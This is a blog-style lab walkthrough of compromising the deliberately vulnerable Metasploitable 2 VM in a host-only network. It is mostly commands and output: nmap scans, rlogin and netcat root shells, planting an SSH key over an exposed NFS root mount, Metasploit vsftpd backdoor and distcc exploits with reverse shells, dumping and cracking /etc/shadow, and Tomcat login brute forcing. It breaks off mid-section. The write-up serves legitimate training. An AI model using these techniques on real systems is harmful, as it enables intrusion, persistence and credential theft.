Working through Metasploitable 2

26 minute read

Metasploitable 2 is an intentionally vulnerable Linux distribution, provided by the folks at Offensive Security, as a training tool for those looking to learn and develop there skills with the Metasploit framework.

This is an older environment, based on Ubuntu 8.04. It comes with a default username and password of msfadmin / msfadmin which can be used for anything really, but which I only used to log in and query the network address of the system (172.16.243.143), which was running as a VMWare VM with a host only network connection. This allowed me to then start probing the system from a fresh Kali Linux 2018.1 VM I had installed alongside of the Metasploitable host.

In this particular case, I chose to save time by just logging in to the target VM and enumerating it’s IP address, since it should be one of only three hosts on my small host-only network created by VMWare (the others being the host itself, as well as the attacking Kali Linux VM).

Once I had the IP address, I took the step of adding that to my Kali /etc/hosts file, so that I could reference it by the name target rather than having to type out the IP address for every command.

echo "172.16.243.143 target" >> /etc/hosts

Scanning

A simple nmap scan resulted in the following results:

root@kali:~# nmap -n -Pn target

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-25 17:06 EDT
Nmap scan report for target (172.16.243.143)
Host is up (0.0018s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 00:0C:29:45:7D:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds

A hint from other sources led me to add the -p- flag, which searches across all ports, rather than just the top 1000 as done by default. This resulted in a few extra high number ports >= 8787:

root@kali:~# nmap -n -Pn -p- target

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-25 17:07 EDT
Nmap scan report for target (172.16.243.143)
Host is up (0.0019s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
36889/tcp open  unknown
45776/tcp open  unknown
49007/tcp open  unknown
51042/tcp open  unknown
MAC Address: 00:0C:29:45:7D:7F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.77 seconds

An even more detailed scan, adding the -A flag to perform OS and service fingerprinting, yielded even greater detail:

root@kali:~# nmap -n -Pn -p- -A target

Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-25 17:08 EDT
Nmap scan report for target (172.16.243.143)
Host is up (0.00049s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 172.16.243.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2018-03-21T18:46:44+00:00; -4d02h24m03s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid:
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      33371/udp  mountd
|   100005  1,2,3      45776/tcp  mountd
|   100021  1,3,4      42007/udp  nlockmgr
|   100021  1,3,4      51042/tcp  nlockmgr
|   100024  1          36889/tcp  status
|_  100024  1          52611/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login       OpenBSD or Solaris rlogind
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    Java RMI Registry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info:
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, SupportsTransactions, SupportsCompression, ConnectWithDatabase, LongColumnFlag, Speaks41ProtocolNew, SwitchToSSLAfterHandshake
|   Status: Autocommit
|_  Salt: QA3w$GyLQ3GL(!m%knh?
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
|_ssl-date: 2018-03-21T18:46:44+00:00; -4d02h24m03s from scanner time.
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info:
|   Protocol version: 3.3
|   Security types:
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
36889/tcp open  status      1 (RPC #100024)
45776/tcp open  mountd      1-3 (RPC #100005)
49007/tcp open  java-rmi    Java RMI Registry
51042/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:45:7D:7F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -4d02h24m03s, deviation: 0s, median: -4d02h24m03s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2018-03-21T14:46:41-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 172.16.243.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.93 seconds

Exploitation

rlogin

The first service that I poked at was the rlogin service, allowing remote login to the system via port 513. This required installing the rsh client:

root@kali:~# apt install rsh-client

… but once installed, it was trivial to log in to the system:

root@kali:~# rlogin target
Last login: Wed Mar 21 14:44:41 EDT 2018 from 172.16.243.144 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable

NFS

Another service that was seen running, was the NFS service on port 2049.

After installing the nfs-common package:

root@kali:~# apt install nfs-common

I was able to exam the NFS exports of the target by utilizing the showmount command:

root@kali:~# showmount -e target
Export list for target:
/ *

This is particularly dangerous, as it allows any system to mount the root filesystem of the target system. Doing so, it was possible to make any arbitrary changes and exfilitration from the target system:

root@kali:~# mount -t nfs target:/ /mnt
root@kali:~# ls -l /mnt
total 96
drwxr-xr-x  2 root root  4096 May 13  2012 bin
drwxr-xr-x  3 root root  4096 Apr 28  2010 boot
lrwxrwxrwx  1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  2 root root  4096 Apr 28  2010 dev
drwxr-xr-x 94 root root  4096 Mar 21 14:57 etc
drwxr-xr-x  6 root root  4096 Apr 16  2010 home
drwxr-xr-x  2 root root  4096 Mar 16  2010 initrd
lrwxrwxrwx  1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root  4096 May 13  2012 lib
drwx------  2 root root 16384 Mar 16  2010 lost+found
drwxr-xr-x  4 root root  4096 Mar 16  2010 media
drwxr-xr-x  3 root root  4096 Apr 28  2010 mnt
-rw-------  1 root root  5821 Mar 21 14:15 nohup.out
drwxr-xr-x  2 root root  4096 Mar 16  2010 opt
dr-xr-xr-x  2 root root  4096 Apr 28  2010 proc
drwxr-xr-x 13 root root  4096 Mar 21 14:15 root
drwxr-xr-x  2 root root  4096 May 13  2012 sbin
drwxr-xr-x  2 root root  4096 Mar 16  2010 srv
drwxr-xr-x  2 root root  4096 Apr 28  2010 sys
drwxrwxrwt  4 root root  4096 Mar 21 14:46 tmp
drwxr-xr-x 12 root root  4096 Apr 28  2010 usr
drwxr-xr-x 14 root root  4096 Mar 17  2010 var
lrwxrwxrwx  1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server

One way, suggested by the Metasploitable guide, which I had read a bit up to this point, suggested to add an SSH key to the /root/.ssh/authorized_keys file on the target, thus allowing direct SSH access into the system.

Step 1: Create a new SSH key on my attacking host

root@kali:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:oEBiBWG7u5H+iq5iHqF+LZxA0YgU8p7j5L//2DoiP3w root@kali
The key's randomart image is:
+---[RSA 2048]----+
|=BO.             |
|=*..             |
| .+   .          |
| o.o . .         |
|.o= .   S        |
|.=+.             |
|.==.o            |
|=.=*+.Eo         |
|OB++=*++o        |
+----[SHA256]-----+

Step 2: Install the key onto the target over the NFS root mount

root@kali:~# ll /mnt/root/.ssh/authorized_keys
-rw-r--r-- 1 root root 405 May 17  2010 /mnt/root/.ssh/authorized_keys
root@kali:~#
root@kali:~# cat /mnt/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
root@kali:~#
root@kali:~# cat ~/.ssh/id_rsa.pub >> /mnt/root/.ssh/authorized_keys
root@kali:~#
root@kali:~# cat /mnt/root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0kBlVF5lXk0vwB7cnOwsIZQOHzoAjkBh+sVZ0IeiUuW9afsSnEA56PGPh5rULNMhEI9fpCzu6nYpu1gA7i/F6in4Pd3UilRPH17cmqHCwfASSN03BTPypdRSSwyHamaTGarop2ZTeeuO+DxSx86FVwTo1LKsfal5rHI86y81zFrWb5Z3TDKPvEog47/3kMdEyYerXxYu/YT3JbaP6BQQo9+OfDa/PI4Qd5Q8aY0cIMUW/RGVnT5ERbGcNk/5TpZRoYVmnvvLyIG+xdGL82xG0brpcmYBi8Njla39mqOjWodjRg/CNbGk5QZI2CG5CdnuI3VbdSwTZovW79xTTKaHf root@kali

Step 3: SSH in to the target system

root@kali:~# ssh target
The authenticity of host 'target (172.16.243.143)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'target,172.16.243.143' (RSA) to the list of known hosts.
Last login: Wed Mar 21 14:49:58 2018 from 172.16.243.144
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~# hostname
metasploitable

Metasploitable Root shell

While perusing the open ports on the target VM, one in particular jumped out:

1524/tcp  open  shell       Metasploitable root shell

This was a curiousity… My first attempt was to attempt using rlogin to connect to the port, which did not appear to work correctly, though did seem to work enough to return part of a prompt to the user:

root@kali:~# rlogin -p 1524 target
oot@metasploitable:/#

ls
^C
root@kali:~# rlogin -p 1524 target
oot@metasploitable:/# id
;
^C

My next approach was to attempt a simple netcat connection to the host, which ended up being successful:

root@kali:~# nc -v target 1524
target [172.16.243.143] 1524 (ingreslock) open
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# hostname
metasploitable

FTP

Another port that stood out was the FTP port 21, which was shown with the nmap ... -A command to allow anonymous logins:

21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 172.16.243.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status

After installing the ftp client into my Kali Linux attack box:

root@kali:~# apt install ftp

This allowed authentication with any username and password combination, in my case, I chose anonymous / anonymous:

root@kali:~# ftp target
Connected to target.
220 (vsFTPd 2.3.4)
Name (target:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

Poking around however, it appears that there aren’t any files available for pilfering:

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.
ftp> pwd
257 "/"
ftp>

Additionally, it appeared that there wasn’t any opportunity to upload files, such as a test file that had been created:

ftp> put test
local: test remote: test
200 PORT command successful. Consider using PASV.
553 Could not create file.

That called for a different approach, which led me to search in the searchsploit exploit-db databse for the service vsftpd:

root@kali:~# searchsploit vsftpd
---------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                    |  Path
                                                                                  | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption                      | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                    | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                    | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                                  | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                            | exploits/unix/remote/17491.rb
---------------------------------------------------------------------------------- ----------------------------------

Jackpot! It appears that there is an exploit available for the particular version, 2.3.4, which is installed on this server. I decided at this point to migrate to using metasploit (this is “metasploit”able after all…) and use it to gain access to the system.

root@kali:~# msfconsole
...
msf > search vsftpd
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 172.16.243.143
RHOST => 172.16.243.143
msf exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 172.16.243.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 172.16.243.143:21 - USER: 331 Please specify the password.
[+] 172.16.243.143:21 - Backdoor service has been spawned, handling...
[+] 172.16.243.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (172.16.243.144:33661 -> 172.16.243.143:6200) at 2018-03-25 17:55:42 -0400

id
uid=0(root) gid=0(root)
hostname
metasploitable

At this point, I decided to attempt upgrading my session in Metasploit to a meterpreter session, successfully accomplishing this via:

^Z
Background session 2? [y/N]  y

msf exploit(unix/ftp/vsftpd_234_backdoor) > sessions -u 2
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [2]

[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.243.144:4433
[*] Sending stage (857352 bytes) to 172.16.243.143
[*] Meterpreter session 3 opened (172.16.243.144:4433 -> 172.16.243.143:49559) at 2018-03-25 17:59:32 -0400
[*] Command stager progress: 100.00% (773/773 bytes)

Password Cracking the Local System Accounts

This allowed me to connect to the system via meterpreter, and download the /etc/passwd and /etc/shadow files:

msf exploit(unix/ftp/vsftpd_234_backdoor) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > download /etc/passwd
[*] Downloading: /etc/passwd -> passwd
[*] Downloaded 1.54 KiB of 1.54 KiB (100.0%): /etc/passwd -> passwd
[*] download   : /etc/passwd -> passwd
meterpreter > download /etc/shadow
[*] Downloading: /etc/shadow -> shadow
[*] Downloaded 1.18 KiB of 1.18 KiB (100.0%): /etc/shadow -> shadow
[*] download   : /etc/shadow -> shadow

Which I was then able to combine using the unshadow command, and crack using John the Ripper:

root@kali:~# unshadow passwd shadow > target_unshadowed.txt

root@kali:~# john target_unshadowed.txt
Created directory: /root/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
postgres         (postgres)
user             (user)
msfadmin         (msfadmin)
service          (service)
123456789        (klog)
batman           (sys)
6g 0:00:01:22  3/3 0.07256g/s 40533p/s 40534c/s 40534C/s juadlyf..juadlin
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

root@kali:~# john --show
Password files required, but none specified

root@kali:~# john --show target_unshadowed.txt
sys:batman:3:3:sys:/dev:/bin/sh
klog:123456789:103:104::/home/klog:/bin/false
msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:user:1001:1001:just a user,111,,:/home/user:/bin/bash
service:service:1002:1002:,,,:/home/service:/bin/bash

6 password hashes cracked, 1 left

This provided several basic passwords that could then be used to break into the system, e.g. via the standard SSH service.

Username Password
sys batman
klog 123456789
msfadmin msfadmin
postgres postgres
user user
service service

telnet

Next, now that I had gotten a few passwords for the system, I turned to the telnet service to attempt to login directly to the system (e.g. using credentials msfadmin / msfadmin as shown on the Message of the Day banner), testing and confirming, that msfadmin had root access to the system:

root@kali:~# telnet target
Trying 172.16.243.143...
Connected to target.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password:
Last login: Wed Mar 21 14:31:57 EDT 2018 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$ hostname
metasploitable
msfadmin@metasploitable:~$ sudo su -
[sudo] password for msfadmin:
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

MySQL

The next service that I went after was the mysql service running on the host. The default credentials for that service can sometimes be username root with no password. In this case, it appeared that this default credential was in fact a viable option.

root@kali:~# mysql -u root -h target
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 10
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)

This actually allowed me to see several users that were established in the MySQL database:

MySQL [(none)]> use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| columns_priv              |
| db                        |
| func                      |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| proc                      |
| procs_priv                |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
17 rows in set (0.00 sec)

MySQL [mysql]> select host, user, password from user;
+------+------------------+----------+
| host | user             | password |
+------+------------------+----------+
|      | debian-sys-maint |          |
| %    | root             |          |
| %    | guest            |          |
+------+------------------+----------+
3 rows in set (0.00 sec)

PostgreSQL

Another database running on the target server was the postgresql database service. This was one that actually showed up when dumping and cracking the user account credentials earlier. By logging in with those credentials (postgres / postgres), it was possible to query the database for the users and their permissions, in this case there was only the one user, “postgres”, a superuser for the database application.

root@kali:~# psql -h target -U postgres
Password for user postgres:
psql (10.1, server 8.3.1)
SSL connection (protocol: TLSv1, cipher: DHE-RSA-AES256-SHA, bits: 256, compression: off)
Type "help" for help.

postgres=# \du
                       List of roles
 Role name |            Attributes             | Member of
-----------+-----------------------------------+-----------
 postgres  | Superuser, Create role, Create DB | {}

distccd

On a whim, I looked randomly at the distccd service running on port 3632 of the target system. A search in searchsploit didn’t result in any hits:

root@kali:~# searchsploit distccd
-------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------
-------------------------------------------------------------------------------------------------------------- ----------------------------------

But a search in Metasploit found an exploit for the DistCC Daemon. Unfortunately, it did not include any information about what versions this exploit would impact, but a shot-in-the-dark to run the exploit ended up successfully returning a shell:

msf > search distccd
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                           Disclosure Date  Rank       Description
   ----                           ---------------  ----       -----------
   exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution



msf > use exploit/unix/misc/distcc_exec
msf exploit(unix/misc/distcc_exec) > run

[*] Started reverse TCP double handler on 172.16.243.144:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo dvVvr9yfS55bmx5j;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "dvVvr9yfS55bmx5j\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (172.16.243.144:4444 -> 172.16.243.143:35054) at 2018-03-25 18:45:45 -0400

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
hostname
metasploitable

Apache Tomcat/Coyote JSP engine 1.1

Another service to look at was the Apache tomcat web server running on port 8180.

8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 172.16.243.143:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
